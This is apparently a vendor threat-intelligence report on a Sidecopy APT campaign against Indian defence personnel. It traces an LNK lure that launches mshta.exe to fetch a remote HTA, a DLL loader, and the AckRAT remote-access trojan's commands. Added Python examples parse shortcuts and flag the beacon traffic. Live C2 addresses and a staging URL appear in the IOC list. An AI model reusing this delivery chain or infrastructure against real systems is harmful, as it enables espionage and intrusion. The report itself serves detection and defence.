
Group Background

In September 2020, Quick Heal disclosed an espionage operation targeting Indian defense forces and armed forces personnel, which it named Operation Sidecopy. The operation began in early 2019 and was so named because the attackers largely copied the TTPs of the Sidewinder APT group.

In July 2021, Cisco Talos researchers identified the actors behind this operation as a distinct group and named it the Sidecopy APT group. Their report showed that the group uses a variety of attack tools, including CetaRAT, ReverseRAT, MargulasRAT, AllakoreRAT and several C# plugins [1].

Sidecopy mainly distributes malware as email attachments: ZIP archives containing LNK or DOC files. The group primarily targets Indian defense forces and armed forces personnel and conducts intelligence collection against Indian government and military personnel. It uses spear-phishing to lure victims in India's defense and other government organizations, and has also used infected USB devices to attack government and military organizations in India and Afghanistan.


Event Summary

Following the tracking report on Sidecopy released in March, the QiAnXin Threat Intelligence Center's RedDrip team captured another batch of Sidecopy attack samples targeting India during routine threat hunting. In this campaign the attackers used a Saudi Arabian delegation's visit to India as the lure, disguised the downloader as a shortcut file and delivered it to victims via phishing emails. When the victim decompresses the archive and runs the bait file, the program downloads a data file from a remote server, decrypts and executes it, and ultimately loads the remote control software AckRAT.

In this campaign Sidecopy's infection chain remained largely consistent with its earlier activity: a malicious LNK file serves as the entry point, followed by a multi-stage chain of nested files that delivers the final payload. The final payload appears to be a new trojan developed by the Sidecopy group; because it repeatedly sends the string 'ack' while communicating with its C2, we have provisionally named it AckRAT.


Detailed Analysis

(1) Basic Information

During threat hunting we did not capture the initial attack payload. Based on Sidecopy's usual tactics and on the archive itself, we assess that the initial vector was a spear-phishing email carrying the archive as an attachment. The victim is lured into opening the archive and then clicking the LNK file inside.

File Name  Saudi_Delegation.zip
MD5        6D724445E65B6407F26A5B0251FDD1E4
Size       3989544 bytes
Type       Zip

After decompression, the archive contains a hidden folder named "Adobe" and a bait LNK file whose name translates as "Saudi delegation".

Analysis of the bait LNK file shows that it invokes the system's mshta.exe to fetch the next-stage payload, which is hosted on the official website of the Indian company Ssynergy.
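The LNK-to-mshta.exe technique above is a good place to automate triage. The following is an added example, not code from the report or from the Sidecopy toolset: a minimal parser for the MS-SHLLINK (.lnk) format that walks the fixed header, skips the optional LinkTargetIDList and LinkInfo blocks and reads the StringData fields, plus a heuristic that flags shortcuts whose target is a living-off-the-land binary and whose arguments carry a remote URL. The sample shortcut is constructed inline; the URL is the delegation path listed in this report's IOCs, but the RelativePath value and the choice of StringData fields are assumptions about the lure, not recovered from the real sample.

```python
"""Minimal MS-SHLLINK (.lnk) parser plus a triage heuristic for LOLBin lures.

Added example, not from the report. Handles the 76-byte ShellLinkHeader, the
optional LinkTargetIDList / LinkInfo blocks and the five StringData fields.
"""
import re
import struct
from dataclasses import dataclass
from typing import List, Optional, Tuple

# LinkCLSID {00021401-0000-0000-C000-000000000046} as stored on disk (little-endian GUID)
LNK_CLSID = bytes.fromhex("0114020000000000C000000000000046")
HEADER_SIZE = 0x4C

# LinkFlags bits (MS-SHLLINK section 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData entries appear in this fixed order, each only if its flag is set
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)


@dataclass
class LnkFields:
    flags: int
    name: Optional[str] = None
    relative_path: Optional[str] = None
    working_dir: Optional[str] = None
    arguments: Optional[str] = None
    icon_location: Optional[str] = None


def is_lnk(data: bytes) -> bool:
    """HeaderSize must be 0x4C and the CLSID must follow it."""
    return (len(data) >= HEADER_SIZE
            and struct.unpack_from("<I", data, 0)[0] == HEADER_SIZE
            and data[4:20] == LNK_CLSID)


def _read_string(data: bytes, offset: int, unicode: bool) -> Tuple[str, int]:
    """One StringData entry: 2-byte CountCharacters, then the characters (no terminator)."""
    (count,) = struct.unpack_from("<H", data, offset)
    offset += 2
    if unicode:
        end = offset + 2 * count
        return data[offset:end].decode("utf-16-le"), end
    end = offset + count
    return data[offset:end].decode("cp1252", errors="replace"), end


def parse_lnk(data: bytes) -> LnkFields:
    if not is_lnk(data):
        raise ValueError("not a Shell Link (.lnk) file")
    (flags,) = struct.unpack_from("<I", data, 20)   # LinkFlags sits right after the CLSID
    offset = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:             # IDListSize (2 bytes) + IDList
        (size,) = struct.unpack_from("<H", data, offset)
        offset += 2 + size
    if flags & HAS_LINK_INFO:                       # LinkInfoSize counts itself
        (size,) = struct.unpack_from("<I", data, offset)
        offset += size
    fields = LnkFields(flags=flags)
    for bit, attr in STRING_FIELDS:
        if flags & bit:
            value, offset = _read_string(data, offset, bool(flags & IS_UNICODE))
            setattr(fields, attr, value)
    return fields


LOLBINS = ("mshta", "powershell", "cmd", "wscript", "cscript", "rundll32", "regsvr32", "certutil")


def triage(fields: LnkFields) -> List[str]:
    """Our heuristics (not the report's): LOLBin target and/or a remote URL in the arguments."""
    findings = []
    target = ((fields.relative_path or "") + " " + (fields.working_dir or "")).lower()
    for lolbin in LOLBINS:
        if lolbin + ".exe" in target:
            findings.append(f"target is LOLBin {lolbin}.exe")
            break
    if re.search(r"https?://", fields.arguments or "", re.IGNORECASE):
        findings.append("remote URL in arguments")
    return findings


def build_sample_lnk(relative_path: str, arguments: str) -> bytes:
    """Constructed LNK with only RelativePath + Arguments (Unicode); other header fields zero."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
    header += bytes(HEADER_SIZE - len(header))

    def sd(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + sd(relative_path) + sd(arguments)


# Assumed RelativePath; the URL is the one in this report's IOC list.
SAMPLE_LNK = build_sample_lnk(
    r"..\..\..\Windows\System32\mshta.exe",
    "https://ssynergy.in/wp-content/themes/twentytwentythree/assets/fonts/inter/delegation/",
)


def triage_sample() -> List[str]:
    return triage(parse_lnk(SAMPLE_LNK))


if __name__ == "__main__":
    f = parse_lnk(SAMPLE_LNK)
    print("target:", f.relative_path)
    print("args:  ", f.arguments)
    print("findings:", triage_sample())
```

Real lures frequently set the LinkTargetIDList instead of RelativePath, so a production version should also walk the IDList for the target path; the heuristic above deliberately checks only the StringData fields the example constructs.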

Ssynergy is a large Indian manufacturer and exporter of raw materials for cosmetics, composites, nutritional supplements and other products, with a history of more than 75 years in materials science. Its website states that its customers include the Indian Prime Minister's Office and the Indian Institute of Technology.

We assess that the Sidecopy group uploaded the payload to the Ssynergy website by exploiting a vulnerability in it, relaying the next stage through a legitimate domain to evade monitoring by some security products. The file hosted there is delegation.hta, the JavaScript-based HTA that Sidecopy habitually uses.


(2) preBotHta.dll

The main task of delegation.hta is to load preBotHta.dll into memory and call its PinkAgain function.

PinkAgain first decrypts the data embedded in the JS code and drops a decoy PDF to distract the victim.

The decoy's content matches the LNK file name: it concerns a Saudi Arabian medical delegation's visit to India to discuss medical matters with Indian military medical officers. The date in the upper right corner is March 17, 2023, indicating that the activity is recent.

Next, the execution path is chosen according to the antivirus information passed in by the JS script. In the current version, however, the same branch is taken regardless of which antivirus product is present: the passed-in data is decrypted, and an executable is dropped and run.


(3) AckRAT

The dropped Trex.exe masquerades as software from Trex Corporation.

It first collects information about the victim: computer name, username, antivirus product and operating system version.

It then sends the collected information to the C2 at 209.126.81.42, port 444, and parses the response. The remote control logic starts only when the C2 returns more than one byte; otherwise the client keeps looping. During our debugging the C2 always returned the single character 'y'.

Because this RAT repeatedly sends the string 'ack' to request data from the C2, we have provisionally named it AckRAT. Its commands and their functions are listed below:

Command 1  Command 2  Function
no         b          Get the names of all files and folders under a specified path and send them to a designated network receiver.
no         d          After sending three 'ack' to the C2, receive the data it returns and write it to a file, without executing it.
no         e          Same as 'd', but after sending three 'ack' to the C2 and receiving the returned data, write it to a file and execute it.
no         f          Delete a specified file or folder.
no         g          Remote shell.
no         c          Upload files to a designated path on the C2.
no         a          Send disk information.
no         z          End process and exit.
no         h          Take a screenshot and send it.
no         i          End process and exit.
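The beacon behaviour described above (a host profile sent to the C2, single-byte 'y' replies while idle, a longer reply to start tasking, and repeated 'ack' strings from the client to pull data) is detectable from reassembled TCP payloads without any signature on the binary. The following is an added example, not code from the report: a small flow analyser that scores each client/server/port flow on those traits and on the C2 address published in this report's IOCs. The payload records are constructed for the example; the host-profile format and the content of the tasking message are placeholders, since the report does not document the wire format, and the real traffic may be framed or encoded differently.

```python
"""Heuristic detection of AckRAT-style beaconing over reassembled TCP payloads.

Added example, not from the report. Input records are (client_ip, server_ip,
server_port, direction, payload) with direction "c2s" or "s2c".
"""
from collections import defaultdict
from typing import Dict, Iterable, List, Set, Tuple

Flow = Tuple[str, str, int]
Record = Tuple[str, str, int, str, bytes]

# C2 listed in the report's IOCs
KNOWN_C2: Set[Tuple[str, int]] = {("209.126.81.42", 444)}

# Constructed sample traffic, not a real capture. The profile string and the
# "TASK" tasking message are placeholders for formats the report does not describe.
SAMPLE_RECORDS: List[Record] = [
    ("10.0.0.5", "209.126.81.42", 444, "c2s", b"DESKTOP-1|user|Windows Defender|Windows 10"),
    ("10.0.0.5", "209.126.81.42", 444, "s2c", b"y"),            # idle: 1 byte, keep looping
    ("10.0.0.5", "209.126.81.42", 444, "c2s", b"DESKTOP-1|user|Windows Defender|Windows 10"),
    ("10.0.0.5", "209.126.81.42", 444, "s2c", b"y"),
    ("10.0.0.5", "209.126.81.42", 444, "c2s", b"DESKTOP-1|user|Windows Defender|Windows 10"),
    ("10.0.0.5", "209.126.81.42", 444, "s2c", b"TASK"),         # >1 byte: remote control starts
    ("10.0.0.5", "209.126.81.42", 444, "c2s", b"ack"),          # three 'ack' before a 'd'/'e' transfer
    ("10.0.0.5", "209.126.81.42", 444, "c2s", b"ack"),
    ("10.0.0.5", "209.126.81.42", 444, "c2s", b"ack"),
    ("10.0.0.5", "209.126.81.42", 444, "s2c", b"MZ\x90\x00" + bytes(60)),  # file body
    # Benign-looking TLS flow for contrast
    ("10.0.0.7", "93.184.216.34", 443, "c2s", b"\x16\x03\x01\x00\xc8\x01\x00\x00\xc4"),
    ("10.0.0.7", "93.184.216.34", 443, "s2c", b"\x16\x03\x03\x00\x5a\x02\x00\x00\x56"),
]


def analyze_flows(records: Iterable[Record],
                  known_c2: Set[Tuple[str, int]] = KNOWN_C2,
                  min_ack: int = 3,
                  min_idle_y: int = 2) -> List[Dict]:
    """Return one finding per flow that matches the known C2 or the beacon traits."""
    stats = defaultdict(lambda: {"ack": 0, "idle_y": 0, "tasking": 0})
    for client, server, port, direction, payload in records:
        s = stats[(client, server, port)]
        if direction == "c2s" and payload.strip().lower() == b"ack":
            s["ack"] += 1
        elif direction == "s2c":
            if payload == b"y":
                s["idle_y"] += 1
            elif len(payload) > 1:
                s["tasking"] += 1

    findings = []
    for flow, s in stats.items():
        reasons = []
        if (flow[1], flow[2]) in known_c2:
            reasons.append("known AckRAT C2")
        if s["ack"] >= min_ack:
            reasons.append(f"{s['ack']} 'ack' requests from client")
        if s["idle_y"] >= min_idle_y:
            reasons.append(f"{s['idle_y']} single-byte 'y' idle replies")
        if reasons:
            findings.append({"flow": flow, "reasons": reasons,
                             "tasking_seen": s["tasking"] > 0})
    return findings


if __name__ == "__main__":
    for f in analyze_flows(SAMPLE_RECORDS):
        print(f["flow"], "->", "; ".join(f["reasons"]),
              "(tasking observed)" if f["tasking_seen"] else "")
```

The behavioural score is kept separate from the IOC match on purpose: the C2 address will rotate, while the idle 'y' / 'ack' pattern is a property of the implant itself. Run it with `known_c2=set()` to see that the sample flow is still flagged on behaviour alone.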

Attribution

The AckRAT attack flow is essentially consistent with the recent Sidecopy attacks that used Indian Ministry of Defence-related documents as lures, which we analyzed in our article last month [2].

Moreover, the LNK files were all generated in the same developer environment.

On that basis we were also able to track down the DetaRAT used in the March Sidecopy attack; its C2 is 185.136.161.129, port 4987, and its C2 command set is unchanged from older versions.

Sidecopy also continues its habit of enriching its RAT code with code taken from the Internet: the new DetaRAT adds browser password harvesting based on open-source projects.


Conclusion

This recent Sidecopy attack is a continuation of the attacks seen in March. The components involved include AllaKoreRAT, ActionRAT, DetaRAT and C++ trojans. The techniques and weapon code are relatively simple, and the group makes extensive use of open-source code and tools available online. We have previously disclosed its attacks on multiple platforms, including Linux and macOS [3]. The QiAnXin Threat Intelligence Center will keep tracking this group in order to detect and respond to its threats promptly.

APT attacks remain a major cybersecurity threat to nations and enterprises. They are typically planned with care by specific actors with commercial or political motives, target particular organizations or countries, and maintain a high degree of stealth over long-running campaigns. Constant vigilance is therefore necessary.


Protection Suggestions

The QiAnXin Threat Intelligence Center reminds users to stay alert to phishing: do not open links of unknown origin shared on social media, do not open email attachments from unknown senders, do not run unfamiliar files with sensational titles, and do not install apps from unofficial channels. Regularly back up important files and keep systems patched.

If you must run an app of unknown origin, you can first submit it to the QiAnXin Threat Intelligence Center's file deep-analysis platform (https://sandbox.ti.qianxin.com/sandbox/page) for assessment. The platform currently supports in-depth analysis of many file formats for both Windows and Android.

All QiAnXin products that draw on the Center's threat intelligence data, including the QiAnXin Threat Intelligence Platform (TIP), Tianqing, the Tianyan Advanced Threat Detection System, QiAnXin NGSOC and QiAnXin Situational Awareness, can accurately detect such attacks.


IOC

MD5

6D724445E65B6407F26A5B0251FDD1E4

D663E977C079D338D47E937F7AFCFBB4

2C65DC705BA503261654AA40484A19E9

42A152594AF53012A3559BD7CDF99056

AC92A32AEE15421AB9E953B1836A691B

E62B5CC773A2240BBFA56B535076905F

C&C

209.126.81.42:444

185.136.161.129:4987

URL

https://ssynergy.in/wp-content/themes/twentytwentythree/assets/fonts/inter/delegation/

https://cornerstonebeverly.org/js/files/docufentososo/doecumentosoneso

https://halterarks.co.uk/img/gallery/misc/files/html5-k/

https://halterarks.co.uk/img/gallery/misc/files/jquery-k/


References

[1]. https://blog.talosintelligence.com/2021/07/Sidecopy.html

[2]. https://ti.qianxin.com/blog/articles/Analysis-of-Sidecopy-Group's-Recent-Attacks-Using-Indian-Ministry-of-Defense-Documents-as-Lures-CN/

[3]. https://ti.qianxin.com/blog/articles/Sidecopy-dual-platform-weapon/
